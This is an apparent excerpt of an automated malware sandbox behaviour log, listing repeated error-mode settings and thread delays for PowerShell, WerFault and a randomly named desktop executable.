Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\9K25QyJ4hA.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\9K25QyJ4hA.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\9K25QyJ4hA.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\9K25QyJ4hA.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\9K25QyJ4hA.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\9K25QyJ4hA.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\9K25QyJ4hA.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\9K25QyJ4hA.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\9K25QyJ4hA.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\9K25QyJ4hA.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\9K25QyJ4hA.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\9K25QyJ4hA.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\9K25QyJ4hA.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\9K25QyJ4hA.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\9K25QyJ4hA.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\9K25QyJ4hA.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\9K25QyJ4hA.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\9K25QyJ4hA.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\9K25QyJ4hA.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\9K25QyJ4hA.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\9K25QyJ4hA.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\9K25QyJ4hA.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\9K25QyJ4hA.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\9K25QyJ4hA.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\9K25QyJ4hA.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\9K25QyJ4hA.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\9K25QyJ4hA.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\9K25QyJ4hA.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\9K25QyJ4hA.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\9K25QyJ4hA.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\9K25QyJ4hA.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\9K25QyJ4hA.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\9K25QyJ4hA.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\9K25QyJ4hA.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\9K25QyJ4hA.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\9K25QyJ4hA.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\9K25QyJ4hA.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\9K25QyJ4hA.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\9K25QyJ4hA.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\9K25QyJ4hA.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\9K25QyJ4hA.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\9K25QyJ4hA.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\9K25QyJ4hA.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\9K25QyJ4hA.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\9K25QyJ4hA.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\9K25QyJ4hA.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\9K25QyJ4hA.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\9K25QyJ4hA.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\9K25QyJ4hA.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\9K25QyJ4hA.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX

Source: C:\Users\user\Desktop\9K25QyJ4hA.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\user\Desktop\9K25QyJ4hA.exe	Thread delayed: delay time: 599984	Jump to behavior
Source: C:\Users\user\Desktop\9K25QyJ4hA.exe	Thread delayed: delay time: 599874	Jump to behavior
Source: C:\Users\user\Desktop\9K25QyJ4hA.exe	Thread delayed: delay time: 599724	Jump to behavior
Source: C:\Users\user\Desktop\9K25QyJ4hA.exe	Thread delayed: delay time: 599593	Jump to behavior
Source: C:\Users\user\Desktop\9K25QyJ4hA.exe	Thread delayed: delay time: 599484	Jump to behavior
Source: C:\Users\user\Desktop\9K25QyJ4hA.exe	Thread delayed: delay time: 599374	Jump to behavior
Source: C:\Users\user\Desktop\9K25QyJ4hA.exe	Thread delayed: delay time: 599265	Jump to behavior
Source: C:\Users\user\Desktop\9K25QyJ4hA.exe	Thread delayed: delay time: 599155	Jump to behavior
Source: C:\Users\user\Desktop\9K25QyJ4hA.exe	Thread delayed: delay time: 599029	Jump to behavior
Source: C:\Users\user\Desktop\9K25QyJ4hA.exe	Thread delayed: delay time: 598921	Jump to behavior
Source: C:\Users\user\Desktop\9K25QyJ4hA.exe	Thread delayed: delay time: 598812	Jump to behavior
Source: C:\Users\user\Desktop\9K25QyJ4hA.exe	Thread delayed: delay time: 598702	Jump to behavior
Source: C:\Users\user\Desktop\9K25QyJ4hA.exe	Thread delayed: delay time: 598593	Jump to behavior
Source: C:\Users\user\Desktop\9K25QyJ4hA.exe	Thread delayed: delay time: 598484	Jump to behavior
Source: C:\Users\user\Desktop\9K25QyJ4hA.exe	Thread delayed: delay time: 598374	Jump to behavior
Source: C:\Users\user\Desktop\9K25QyJ4hA.exe	Thread delayed: delay time: 598265	Jump to behavior
Source: C:\Users\user\Desktop\9K25QyJ4hA.exe	Thread delayed: delay time: 598156	Jump to behavior
Source: C:\Users\user\Desktop\9K25QyJ4hA.exe	Thread delayed: delay time: 598046	Jump to behavior
Source: C:\Users\user\Desktop\9K25QyJ4hA.exe	Thread delayed: delay time: 597937	Jump to behavior
Source: C:\Users\user\Desktop\9K25QyJ4hA.exe	Thread delayed: delay time: 597827	Jump to behavior
Source: C:\Users\user\Desktop\9K25QyJ4hA.exe	Thread delayed: delay time: 597718	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\user\Desktop\9K25QyJ4hA.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\user\Desktop\9K25QyJ4hA.exe	Thread delayed: delay time: 599937	Jump to behavior
Source: C:\Users\user\Desktop\9K25QyJ4hA.exe	Thread delayed: delay time: 599828	Jump to behavior
Source: C:\Users\user\Desktop\9K25QyJ4hA.exe	Thread delayed: delay time: 599717	Jump to behavior
Source: C:\Users\user\Desktop\9K25QyJ4hA.exe	Thread delayed: delay time: 599609	Jump to behavior
Source: C:\Users\user\Desktop\9K25QyJ4hA.exe	Thread delayed: delay time: 599500	Jump to behavior
Source: C:\Users\user\Desktop\9K25QyJ4hA.exe	Thread delayed: delay time: 599389	Jump to behavior
Source: C:\Users\user\Desktop\9K25QyJ4hA.exe	Thread delayed: delay time: 599281	Jump to behavior
Source: C:\Users\user\Desktop\9K25QyJ4hA.exe	Thread delayed: delay time: 599172	Jump to behavior
Source: C:\Users\user\Desktop\9K25QyJ4hA.exe	Thread delayed: delay time: 599062	Jump to behavior
